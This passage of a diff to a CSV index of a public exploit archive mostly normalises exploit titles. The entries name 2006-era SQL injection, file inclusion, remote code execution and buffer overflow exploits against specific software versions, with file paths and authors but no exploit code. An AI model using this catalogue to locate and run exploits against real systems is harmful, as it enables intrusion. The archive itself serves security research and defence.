Execution",2006-02-19,rgod,php,webapps,0 1513,platforms/php/webapps/1513.php,"BXCP 0.2.9.9 - (tid) SQL Injection",2006-02-19,x128,php,webapps,0 1514,platforms/asp/webapps/1514.pl,"MiniNuke 1.8.2b - (pages.asp) SQL Injection",2006-02-19,nukedx,asp,webapps,0 1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0 1516,platforms/php/webapps/1516.php,"ilchClan 1.05g - (tid) SQL Injection",2006-02-20,x128,php,webapps,0 1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Privilege Escalation",2006-02-20,"Marco Ivaldi",linux,local,0 -1519,platforms/osx/remote/1519.pm,"Apple Mac OS X Safari Browser - (Safe File) Remote Code Execution (Metasploit)",2006-02-22,"H D Moore",osx,remote,0 +1519,platforms/osx/remote/1519.pm,"Apple Mac OSX Safari Browser - (Safe File) Remote Code Execution (Metasploit)",2006-02-22,"H D Moore",osx,remote,0 1520,platforms/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow (MS06-006) (3)",2006-02-22,"Matthew Murphy",windows,remote,0 1521,platforms/php/webapps/1521.php,"Noahs Classifieds 1.3 - (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0 1522,platforms/php/webapps/1522.php,"NOCC Webmail 1.0 - (Local Inclusion) Remote Code Execution",2006-02-23,rgod,php,webapps,0 -1523,platforms/php/webapps/1523.cpp,"PHP-Nuke 7.5 - 7.8 (Search) SQL Injection",2006-02-23,unitedbr,php,webapps,0 -1524,platforms/php/webapps/1524.htm,"VHCS 2.4.7.1 - (Add User) Authentication Bypass Exploit",2006-02-23,RoMaNSoFt,php,webapps,0 +1523,platforms/php/webapps/1523.cpp,"PHP-Nuke 7.5 - 7.8 'Search' SQL Injection",2006-02-23,unitedbr,php,webapps,0 +1524,platforms/php/webapps/1524.htm,"VHCS 2.4.7.1 - (Add User) Authentication Bypass",2006-02-23,RoMaNSoFt,php,webapps,0 1525,platforms/php/webapps/1525.pl,"phpWebSite 0.10.0-full - (topics.php) SQL Injection",2006-02-24,SnIpEr_SA,php,webapps,0 1526,platforms/php/webapps/1526.php,"Lansuite 2.1.0 Beta - (fid) SQL Injection",2006-02-24,x128,php,webapps,0 1527,platforms/php/webapps/1527.pl,"iGENUS WebMail 2.0.2 - (config_inc.php) Remote Code Execution",2006-02-25,rgod,php,webapps,0 @@ -1286,7 +1286,7 @@ id,file,description,date,author,platform,type,port 1542,platforms/php/webapps/1542.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)",2006-03-01,LorD,php,webapps,0 1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - 'cookie' Final SQL Injection (mq=off)",2006-03-01,KingOfSka,php,webapps,0 1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD (fileid) SQL Injection",2006-03-01,nukedx,php,webapps,0 -1545,platforms/osx/local/1545.pl,"Apple Mac OS X - '/usr/bin/passwd' Custom Passwd Privilege Escalation",2006-03-01,vade79,osx,local,0 +1545,platforms/osx/local/1545.pl,"Apple Mac OSX - '/usr/bin/passwd' Custom Passwd Privilege Escalation",2006-03-01,vade79,osx,local,0 40340,platforms/windows/local/40340.txt,"WIN-911 7.17.00 - Multiple Vulnerabilities",2016-09-06,sh4d0wman,windows,local,0 1546,platforms/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities (PoC)",2006-03-02,lorenzo,php,webapps,0 @@ -1320,11 +1320,11 @@ id,file,description,date,author,platform,type,port 1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Attack Vectors",2006-03-11,Nomenumbra,php,webapps,0 1577,platforms/irix/local/1577.sh,"SGI IRIX 6.5.28 - (runpriv) Design Error",2005-10-10,anonymous,irix,local,0 1578,platforms/linux/remote/1578.c,"PeerCast 0.1216 - (nextCGIarg) Remote Buffer Overflow (2)",2006-03-12,darkeagle,linux,remote,7144 -1579,platforms/linux/local/1579.pl,"Ubuntu 5.10 - Installer Password Disclosure",2006-03-12,"Kristian Hermansen",linux,local,0 -1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution Exploit",2006-03-13,rgod,php,webapps,0 +1579,platforms/linux/local/1579.pl,"Ubuntu 5.10 Installer - Password Disclosure",2006-03-12,"Kristian Hermansen",linux,local,0 +1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,php,webapps,0 1582,platforms/linux/remote/1582.c,"crossfire-server 1.9.0 - SetUp() Remote Buffer Overflow",2006-03-13,landser,linux,remote,13327 -1583,platforms/osx/remote/1583.pl,"Apple Mac OS X 10.4.5 Mail.app - (Real Name) Buffer Overflow",2006-03-13,"Kevin Finisterre",osx,remote,25 -1584,platforms/windows/local/1584.cpp,"Microsoft Windows - Telephony Service Command Execution Exploit (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0 +1583,platforms/osx/remote/1583.pl,"Apple Mac OSX 10.4.5 Mail.app - (Real Name) Buffer Overflow",2006-03-13,"Kevin Finisterre",osx,remote,25 +1584,platforms/windows/local/1584.cpp,"Microsoft Windows - Telephony Service Command Execution (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0 1585,platforms/php/webapps/1585.php,"PHP iCalendar 2.21 - 'cookie' Remote Code Execution",2006-03-15,rgod,php,webapps,0 1586,platforms/php/webapps/1586.php,"PHP iCalendar 2.21 - (publish.ical.php) Remote Code Execution",2006-03-15,rgod,php,webapps,0 1587,platforms/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 - 'Include' Remote Code Execution",2006-03-15,uid0,php,webapps,0 @@ -1341,11 +1341,11 @@ id,file,description,date,author,platform,type,port 1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6 - (script action handlers) (mshtml.dll) Denial of Service",2006-03-21,"Michal Zalewski",windows,dos,0 1599,platforms/windows/dos/1599.cpp,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",windows,dos,0 1600,platforms/php/webapps/1600.php,"FreeWPS 2.11 - (images.php) Remote Code Execution",2006-03-21,x128,php,webapps,0 -1601,platforms/windows/dos/1601.c,"ASP.NET w3wp - (COM Components) Remote Crash Exploit",2006-03-22,"Debasis Mohanty",windows,dos,0 +1601,platforms/windows/dos/1601.c,"ASP.NET w3wp - (COM Components) Remote Crash",2006-03-22,"Debasis Mohanty",windows,dos,0 1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - (Error Messages) Remote Buffer Overflow",2006-03-22,"esca zoo",multiple,remote,11000 1603,platforms/windows/dos/1603.c,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6 - (mshtml.dll checkbox) Crash",2006-03-22,"Stelian Ene",windows,dos,0 -1605,platforms/php/webapps/1605.php,"XHP CMS 0.5 - (upload) Remote Command Execution Exploit",2006-03-22,rgod,php,webapps,0 +1605,platforms/php/webapps/1605.php,"XHP CMS 0.5 - (upload) Remote Command Execution",2006-03-22,rgod,php,webapps,0 1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer - (createTextRang) Remote Code Execution",2006-03-23,darkeagle,windows,remote,0 1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (1)",2006-03-23,ATmaCA,windows,remote,0 1608,platforms/php/webapps/1608.php,"WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution",2006-03-25,rgod,php,webapps,0 @@ -1358,10 +1358,10 @@ id,file,description,date,author,platform,type,port 1615,platforms/windows/dos/1615.txt,"Microsoft Office Products - Array Index Bounds Error (Unpatched) (PoC)",2006-03-27,posidron,windows,dos,0 1616,platforms/php/webapps/1616.pl,"Aztek Forum 4.00 - (myadmin.php) User Privilege Escalation",2006-03-26,Sparah,php,webapps,0 1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - 'sendpassword.php' SQL Injection",2006-03-28,rgod,php,webapps,0 -1618,platforms/php/webapps/1618.c,"GreyMatter WebLog 1.21d - Remote Command Execution Exploit (1)",2006-03-28,No_Face_King,php,webapps,0 -1619,platforms/php/webapps/1619.pl,"GreyMatter WebLog 1.21d - Remote Command Execution Exploit (2)",2006-03-28,Hessam-x,php,webapps,0 +1618,platforms/php/webapps/1618.c,"GreyMatter WebLog 1.21d - Remote Command Execution (1)",2006-03-28,No_Face_King,php,webapps,0 +1619,platforms/php/webapps/1619.pl,"GreyMatter WebLog 1.21d - Remote Command Execution (2)",2006-03-28,Hessam-x,php,webapps,0 1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer - (createTextRang) Remote Exploit (Metasploit)",2006-04-01,"Randy Flood",windows,remote,0 -1621,platforms/php/webapps/1621.php,"Plogger Beta 2.1 - Administrative Credentials Disclosure Exploit",2006-03-28,rgod,php,webapps,0 +1621,platforms/php/webapps/1621.php,"Plogger Beta 2.1 - Administrative Credentials Disclosure",2006-03-28,rgod,php,webapps,0 1622,platforms/multiple/dos/1622.pl,"RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)",2006-03-28,"Federico L. Bossi Bonin",multiple,dos,0 1623,platforms/asp/webapps/1623.pl,"EzASPSite 2.0 RC3 - (Scheme) SQL Injection",2006-03-29,nukedx,asp,webapps,0 1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 - (Rev. 910) rdist NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",tru64,local,0 @@ -1383,7 +1383,7 @@ id,file,description,date,author,platform,type,port 1645,platforms/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution",2006-04-04,undefined1_,php,webapps,0 1646,platforms/php/webapps/1646.php,"phpMyChat 0.14.5 - (SYS enter) Remote Code Execution",2006-04-05,rgod,php,webapps,0 1647,platforms/php/webapps/1647.php,"phpMyChat 0.15.0dev - (SYS enter) Remote Code Execution",2006-04-06,rgod,php,webapps,0 -1650,platforms/php/webapps/1650.pl,"Horde Help Viewer 3.1 - Remote Command Execution Exploit",2006-04-07,deese,php,webapps,0 +1650,platforms/php/webapps/1650.pl,"Horde Help Viewer 3.1 - Remote Command Execution",2006-04-07,deese,php,webapps,0 1651,platforms/php/dos/1651.php,"ADODB < 4.70 - (tmssql.php) Denial of Service",2006-04-09,rgod,php,dos,0 1652,platforms/php/webapps/1652.php,"ADODB < 4.70 (PHPOpenChat 3.0.x) - Server.php SQL Injection",2006-04-09,rgod,php,webapps,0 1653,platforms/php/webapps/1653.txt,"dnGuestbook 2.0 - SQL Injection",2006-04-09,snatcher,php,webapps,0 @@ -1396,19 +1396,19 @@ id,file,description,date,author,platform,type,port 1661,platforms/php/webapps/1661.pl,"phpBB 2.0.19 - (user_sig_bbcode_uid) Remote Code Execution",2006-04-10,RusH,php,webapps,0 1662,platforms/php/webapps/1662.php,"Clansys 1.1 (showid) - SQL Injection",2006-04-10,snatcher,php,webapps,0 1663,platforms/php/webapps/1663.php,"Simplog 0.9.2 - (s) Remote Commands Execution Exploit",2006-04-11,rgod,php,webapps,0 -1664,platforms/windows/remote/1664.py,"Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow Exploit",2006-04-11,"Paul Haas",windows,remote,0 +1664,platforms/windows/remote/1664.py,"Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow",2006-04-11,"Paul Haas",windows,remote,0 1665,platforms/php/webapps/1665.pl,"Sphider 1.3 - (configset.php) Arbitrary Remote File Inclusion",2006-04-12,rgod,php,webapps,0 1666,platforms/php/webapps/1666.php,"PHP121 Instant Messenger 1.4 - Remote Code Execution",2006-04-12,rgod,php,webapps,0 1667,platforms/multiple/dos/1667.html,"Mozilla Firefox 1.5.0.1 / Camino 1.0 - Null Pointer Dereference Crash",2006-04-13,BuHa,multiple,dos,0 -1668,platforms/php/webapps/1668.php,"vBulletin ImpEx 1.74 - Remote Command Execution Exploit",2006-04-13,ReZEN,php,webapps,0 -1669,platforms/cgi/webapps/1669.pl,"Censtore 7.3.x - (censtore.cgi) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 -1670,platforms/cgi/webapps/1670.pl,"quizz 1.01 - (quizz.pl) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 +1668,platforms/php/webapps/1668.php,"vBulletin ImpEx 1.74 - Remote Command Execution",2006-04-13,ReZEN,php,webapps,0 +1669,platforms/cgi/webapps/1669.pl,"Censtore 7.3.x - (censtore.cgi) Remote Command Execution",2006-04-13,FOX_MULDER,cgi,webapps,0 +1670,platforms/cgi/webapps/1670.pl,"quizz 1.01 - (quizz.pl) Remote Command Execution",2006-04-13,FOX_MULDER,cgi,webapps,0 1671,platforms/multiple/dos/1671.c,"panic-reloaded - TCP Denial of Service Tool",2006-04-13,hash,multiple,dos,0 1672,platforms/php/webapps/1672.pl,"PAJAX 0.5.1 - Remote Code Execution",2006-04-13,Stoney,php,webapps,0 1673,platforms/php/webapps/1673.php,"phpWebSite 0.10.2 - (hub_dir) Remote Commands Execution Exploit",2006-04-14,rgod,php,webapps,0 1674,platforms/php/webapps/1674.txt,"osCommerce 2.2 - (extras) Source Code Disclosure",2006-04-14,rgod,php,webapps,0 -1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 - (sysinfo.cgi) Remote Command Execution Exploit",2006-04-14,rgod,cgi,webapps,0 -1678,platforms/php/webapps/1678.php,"PHP Album 0.3.2.3 - Remote Command Execution Exploit",2006-04-15,rgod,php,webapps,0 +1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 - (sysinfo.cgi) Remote Command Execution",2006-04-14,rgod,cgi,webapps,0 +1678,platforms/php/webapps/1678.php,"PHP Album 0.3.2.3 - Remote Command Execution",2006-04-15,rgod,php,webapps,0 1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)",2006-04-15,"H D Moore",novell,remote,8300 1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - 'LOGIN' SQL Injection (Metasploit)",2006-04-15,Nicob,cgi,webapps,0 1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit)",2006-04-15,anonymous,windows,remote,8080 @@ -1423,7 +1423,7 @@ id,file,description,date,author,platform,type,port 1698,platforms/php/webapps/1698.php,"Mambo 4.5.3 & Joomla 1.0.7 - (feed) Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote File Inclusion",2006-04-19,"GroundZero Security",php,webapps,0 1700,platforms/asp/webapps/1700.pl,"ASPSitem 1.83 - (Haberler.asp) SQL Injection",2006-04-19,nukedx,asp,webapps,0 -1701,platforms/php/webapps/1701.php,"PHPSurveyor 0.995 - (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0 +1701,platforms/php/webapps/1701.php,"PHPSurveyor 0.995 - (surveyid) Remote Command Execution",2006-04-20,rgod,php,webapps,0 1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x - Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004 1704,platforms/php/webapps/1704.pl,"CoreNews 2.0.1 - (userid) SQL Injection",2006-04-21,nukedx,php,webapps,0 1705,platforms/php/webapps/1705.pl,"Simplog 0.9.3 - (tid) SQL Injection",2006-04-21,nukedx,php,webapps,0 @@ -1433,10 +1433,10 @@ id,file,description,date,author,platform,type,port 1709,platforms/multiple/dos/1709.txt,"OpenTTD 0.4.7 - Multiple Vulnerabilities",2006-04-23,"Luigi Auriemma",multiple,dos,0 1710,platforms/php/webapps/1710.txt,"Clansys 1.1 - 'index.php' PHP Code Insertion",2006-04-23,nukedx,php,webapps,0 1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review 2B - Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0 -1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0 +1712,platforms/osx/dos/1712.html,"Apple Mac OSX Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0 1713,platforms/php/webapps/1713.pl,"FlexBB 0.5.5 - (function/showprofile.php) SQL Injection",2006-04-24,Devil-00,php,webapps,0 1714,platforms/asp/webapps/1714.txt,"BK Forum 4.0 - (member.asp) SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 -1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) Denial of Service (PoC)",2006-04-24,"Yannick von Arx",osx,dos,0 +1715,platforms/osx/dos/1715.html,"Apple Mac OSX Safari 2.0.3 - (417.9.2) (ROWSPAN) Denial of Service (PoC)",2006-04-24,"Yannick von Arx",osx,dos,0 1716,platforms/multiple/dos/1716.html,"Mozilla Firefox 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service (PoC)",2006-04-24,splices,multiple,dos,0 1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - (long get request) Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer - 'parser.exe' Denial of Service",2006-04-26,sh4d0wman,hardware,dos,0 @@ -1458,7 +1458,7 @@ id,file,description,date,author,platform,type,port 1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0 1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - (parse_xml.cgi) Code Execution",2003-02-24,FOX_MULDER,osx,remote,0 1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion",2006-05-02,R@1D3N,php,webapps,0 -1741,platforms/linux/remote/1741.c,"MySQL 5.0.20 - COM_TABLE_DUMP Memory Leak/Remote Buffer Overflow Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306 +1741,platforms/linux/remote/1741.c,"MySQL 5.0.20 - COM_TABLE_DUMP Memory Leak/Remote Buffer Overflow",2006-05-02,"Stefano Di Paola",linux,remote,3306 1742,platforms/linux/remote/1742.c,"MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0 1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow (PoC)",2006-05-03,"Jerome Athias",windows,dos,0 1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0 @@ -1466,7 +1466,7 @@ id,file,description,date,author,platform,type,port 1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0 1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - (USER) Remote Buffer Overflow (PoC)",2006-05-04,rewterz,windows,dos,0 1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow (PoC)",2006-05-04,Preddy,windows,dos,0 -1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow Exploit",2006-05-05,landser,linux,remote,0 +1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow",2006-05-05,landser,linux,remote,0 1751,platforms/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - 'catid' SQL Injection",2006-05-05,[Oo],php,webapps,0 1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion",2006-05-05,IGNOR3,php,webapps,0 1753,platforms/php/webapps/1753.txt,"TotalCalendar 2.30 - (inc) Remote File Inclusion",2006-05-05,Aesthetico,php,webapps,0 @@ -1506,7 +1506,7 @@ id,file,description,date,author,platform,type,port 1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900 1792,platforms/windows/dos/1792.txt,"GNUnet 0.7.0d - (Empty UDP Packet) Remote Denial of Service",2006-05-15,"Luigi Auriemma",windows,dos,0 1793,platforms/php/webapps/1793.pl,"DeluxeBB 1.06 - (name) SQL Injection (mq=off)",2006-05-15,KingOfSka,php,webapps,0 -1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass Exploit (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900 +1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900 1795,platforms/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 1796,platforms/php/webapps/1796.php,"PHP-Fusion 6.00.306 - (srch_where) SQL Injection",2006-05-16,rgod,php,webapps,0 1797,platforms/php/webapps/1797.php,"DeluxeBB 1.06 - (Attachment mod_mime) Remote Exploit",2006-05-16,rgod,php,webapps,0 @@ -1523,7 +1523,7 @@ id,file,description,date,author,platform,type,port 1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion",2006-05-20,Kacper,php,webapps,0 1810,platforms/php/webapps/1810.pl,"Woltlab Burning Board 2.3.5 - (links.php) SQL Injection",2006-05-20,666,php,webapps,0 1811,platforms/php/webapps/1811.php,"XOOPS 2.0.13.2 - xoopsOption[nocommon] Remote Exploit",2006-05-21,rgod,php,webapps,0 -40336,platforms/windows/local/40336.py,"Navicat Premium 11.2.11 (64bit) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",windows,local,0 +40336,platforms/windows/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",windows,local,0 1812,platforms/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion",2006-05-21,X0r_1,php,webapps,0 1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow (1)",2006-05-21,kingcope,linux,remote,110 1814,platforms/php/webapps/1814.txt,"UBB Threads 6.4.x-6.5.2 - (thispath) Remote File Inclusion",2006-05-22,V4mu,php,webapps,0 @@ -1563,7 +1563,7 @@ id,file,description,date,author,platform,type,port 1850,platforms/asp/webapps/1850.htm,"Nukedit CMS 4.9.6 - Unauthorized Admin Add Exploit",2006-05-29,FarhadKey,asp,webapps,0 1851,platforms/php/webapps/1851.txt,"gnopaste 0.5.3 - 'common.php' Remote File Inclusion",2006-05-30,SmokeZ,php,webapps,0 1852,platforms/linux/dos/1852.c,"gxine 0.5.6 - (HTTP Plugin) Remote Buffer Overflow (PoC)",2006-05-30,"Federico L. Bossi Bonin",linux,dos,0 -1853,platforms/php/webapps/1853.php,"pppBlog 0.3.8 - (randompic.php) System Disclosure Exploit",2006-05-31,rgod,php,webapps,0 +1853,platforms/php/webapps/1853.php,"pppBlog 0.3.8 - (randompic.php) System Disclosure",2006-05-31,rgod,php,webapps,0 1854,platforms/php/webapps/1854.txt,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (1)",2006-05-31,Kacper,php,webapps,0 1855,platforms/php/webapps/1855.txt,"metajour 2.1 - (system_path) Remote File Inclusion",2006-05-31,Kacper,php,webapps,0 1856,platforms/windows/dos/1856.url,"Microsoft Internet Explorer 6 - 'inetconn.dll' Stack Overflow Crash",2006-05-31,Mr.Niega,windows,dos,0 @@ -1592,9 +1592,9 @@ id,file,description,date,author,platform,type,port 1879,platforms/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - (file_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0 1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - (da_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 -1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a - 'edit.php' Remote Password Disclosure Exploit",2006-06-05,DarkFig,php,webapps,0 +1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a - 'edit.php' Remote Password Disclosure",2006-06-05,DarkFig,php,webapps,0 1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - (wk_lang.php) Remote File Inclusion",2006-06-06,Kacper,php,webapps,0 -1884,platforms/asp/webapps/1884.htm,"myNewsletter 1.1.2 - (adminLogin.asp) Login Bypass Exploit",2006-06-06,FarhadKey,asp,webapps,0 +1884,platforms/asp/webapps/1884.htm,"myNewsletter 1.1.2 - (adminLogin.asp) Login Bypass",2006-06-06,FarhadKey,asp,webapps,0 1885,platforms/windows/remote/1885.pl,"QBik Wingate 6.1.1.1077 - (POST) Remote Buffer Overflow",2006-06-07,kingcope,windows,remote,80 1886,platforms/php/webapps/1886.txt,"OpenEMR 2.8.1 - (fileroot) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - (post.php) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 @@ -1611,19 +1611,19 @@ id,file,description,date,author,platform,type,port 1898,platforms/php/webapps/1898.txt,"WebprojectDB 0.1.3 - (INCDIR) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0 1899,platforms/php/webapps/1899.txt,"free QBoard 1.1 - (qb_path) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0 1900,platforms/asp/webapps/1900.txt,"MaxiSepet 1.0 - (link) SQL Injection",2006-06-11,nukedx,asp,webapps,0 -1901,platforms/php/webapps/1901.pl,"RCblog 1.03 - (POST)Remote Command Execution Exploit",2006-06-11,Hessam-x,php,webapps,0 +1901,platforms/php/webapps/1901.pl,"RCblog 1.03 - (POST)Remote Command Execution",2006-06-11,Hessam-x,php,webapps,0 1902,platforms/php/webapps/1902.txt,"AWF CMS 1.11 - (spaw_root) Remote File Inclusion",2006-06-11,"Federico Fazzi",php,webapps,0 1903,platforms/php/webapps/1903.txt,"Content-Builder (CMS) 0.7.5 - Multiple Include Vulnerabilities",2006-06-11,"Federico Fazzi",php,webapps,0 1904,platforms/php/webapps/1904.php,"blur6ex 0.3.462 - 'ID' Admin Disclosure / Blind SQL Injection",2006-06-12,rgod,php,webapps,0 1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x - (root) Remote File Inclusion",2006-06-12,"Federico Fazzi",php,webapps,0 1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow",2006-06-12,h07,windows,remote,0 1907,platforms/php/webapps/1907.txt,"aWebNews 1.5 - (visview.php) Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0 -1908,platforms/php/webapps/1908.txt,"Minerva 2.0.8a Build 237 - 'phpbb_root_path' File Include",2006-06-13,Kacper,php,webapps,0 +1908,platforms/php/webapps/1908.txt,"Minerva 2.0.8a Build 237 - 'phpbb_root_path' File Inclusion",2006-06-13,Kacper,php,webapps,0 1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution",2006-06-13,"Javier Olascoaga",php,webapps,0 1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0 1911,platforms/windows/local/1911.c,"Microsoft Windows 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0 -1912,platforms/php/webapps/1912.txt,"The Bible Portal Project 2.12 - (destination) File Include",2006-06-14,Kacper,php,webapps,0 -1913,platforms/php/webapps/1913.txt,"PHP Blue Dragon CMS 2.9.1 - (template.php) File Include",2006-06-14,"Federico Fazzi",php,webapps,0 +1912,platforms/php/webapps/1912.txt,"The Bible Portal Project 2.12 - (destination) File Inclusion",2006-06-14,Kacper,php,webapps,0 +1913,platforms/php/webapps/1913.txt,"PHP Blue Dragon CMS 2.9.1 - (template.php) File Inclusion",2006-06-14,"Federico Fazzi",php,webapps,0 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0 1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,windows,remote,0 1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - (templatefolder) Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0 @@ -1668,11 +1668,11 @@ id,file,description,date,author,platform,type,port 1955,platforms/php/webapps/1955.txt,"CBSms Mambo Module 1.0 - Remote File Inclusion",2006-06-26,Kw3[R]Ln,php,webapps,0 1956,platforms/php/webapps/1956.txt,"Pearl For Mambo 